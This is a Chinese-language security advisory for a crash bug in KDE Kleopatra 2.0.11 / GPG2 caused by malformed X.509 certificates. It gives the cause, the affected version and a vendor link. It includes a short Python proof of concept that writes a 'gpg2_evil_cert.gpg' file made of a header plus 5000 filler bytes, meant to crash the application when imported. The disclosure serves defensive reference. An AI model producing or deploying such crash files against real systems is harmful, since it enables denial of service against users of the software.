漏洞起因
异常条件处理失败错误
影响系统
KDE Kleopatra 2.0.11
不受影响系统
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须访问Kleopatra。
漏洞信息
Kleopatra是一款GPGSM密钥箱中管理X.509证书的KDE工具。
Kleopatra不正确处理畸形证书 ,远程攻击者可以利用漏洞使应用程序崩溃。
测试方法
#!/usr/bin/env python
################################################################
#
# GPG2/Kleopatra 2.0.11 – Malformed Certificate Crash PoC
# Note: Part of the GPG4Win Package v2.0.1
# Found By: Dr_IDE
# Tested On: 7RC, XPSP3
# Usage: Import the Cert into Kleopatra, GPG2.exe Crashes
#
################################################################
# Seems to only check for the presense of this signature
cert = ("\x99\x03\x2E\x04\x4A\xDC\xA8\x29\x11\x08\x20");
cert += ("\x41" * 5000);
try:
print ("[*] Creating evil GPG cert.");
f1 = open("gpg2_evil_cert.gpg","w");
f1.write(cert);
f1.close();
print ("[*] File created successfully. Import it.");
except:
print ("[-] Error.");
厂商解决方案
目前没有详细解决方案提供:
http://www.kde-apps.org/content/show.php/Kleopatra?content=82427
漏洞提供者
Dr_IDE
0 条评论。